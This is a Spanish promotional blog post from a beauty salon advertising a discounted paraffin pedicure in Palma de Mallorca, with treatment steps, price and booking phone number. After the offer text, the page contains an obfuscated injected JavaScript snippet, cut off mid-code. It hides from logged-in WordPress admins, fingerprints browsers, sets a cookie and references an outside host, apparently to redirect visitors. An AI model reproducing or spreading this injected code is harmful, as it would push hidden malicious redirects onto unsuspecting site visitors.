Pedicura de Parafina en Perfumes Tin Tin

El buen tiempo ya está aquí y con él empezamos a ir más destapados, por ello en los Institutos de Belleza de Perfumes Tin Tin queremos que estés preparada para poner a punto tus pies.

A partir de hoy día 25 de Mayo y durante todo el mes de junio disfruta de nuestras ofertas en pedicura con parafina.

Comenzamos una hora de ritual para nuestros pies que nos ayudarán a recuperar nuestros pies que probablemente estarán resentidos tras un invierno en el que el calzado cerrado ha hecho mella.

El primer paso será retirar el esmalte en el caso de que estuvieran previamente esmaltados.

Acto seguido sumergiremos nuestros pies durante unos 5 minutos cubriendo el tobillo de forma que consigamos que se ablanden las superficies rugosas y resecas mientras se hidrata el resto de la zona.

Una vez hemos permanecido unos minutos en remojo pasamos a trabajar las durezas de los pies con productos que ayudan a reblandecer las pieles muertas de la zona.

Continuamos empujando las cutículas con un palillo de naranjo, y aplicando un tratamiento hidratante específico para ellas.

Pasamos a pulir con una máquina específica para ello los talones e impurezas.

Llega el momento de la hidratación a través de la parafina, su efecto antioxidante y regenerante es perfecto para la puesta a punto de nuestros pies para el verano.

La parafina ayuda a eliminar manchas y activa la circulación sanguínea.

pedicura con parafina en tintin

Para su aplicación sumergeremos los pies durante unos segundos en un recipiente que mantiene la parafina a temperatura tibia y cuando ya tenemos el pie completamente cubierto lo cubriremos de un calcetín el cual ayudará durante unos 10 minutos a que la parafina penetre e hidrate el pie. Pasados los 10 minutos notaremos como si hubiésemos envuelto nuestros pies con la cera de una vela ya que se habrá solidificado.

El resultado es más que evidente unos pies suaves como la seda en menos de una hora. Pasamos a realizar un relajante masaje en los pies con un aceite para masajes de Decleor que hace que nos transportemos por segundos al paraíso.

Las miles de terminaciones nerviosas que tenemos en los pies hacen que un masaje de pies nos libere tensiones algo que nunca viene mal.

Para finalizar pasamos al color, en los Institutos de Belleza de Perfumerías Tin Tin trabajamos con las mejores marcas de esmaltes entre las que encontrarás Dior o Yves Saint Laurent.

Utilizamos productos de la mejor calidad para que la duración y las sensaciones de nuestros tratamientos estén al gusto de nuestros clientes.

pedicura parafina

Anímate y ven a poner tus pies a punto con una pedicura de parafina por sólo 20€ en lugar de 30€, un precio super asequible apto para todos los bolsillos.

Llama al 971 21 43 01 y coge tu cita en nuestro Instituto de Belleza de la calle Olmos,18 en Palma de Mallorca.

Oferta válida desde el 25 de mayo y durante todo el mes de junio.

 Ya no tienes excusa para tener los pies perfectos para este verano.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone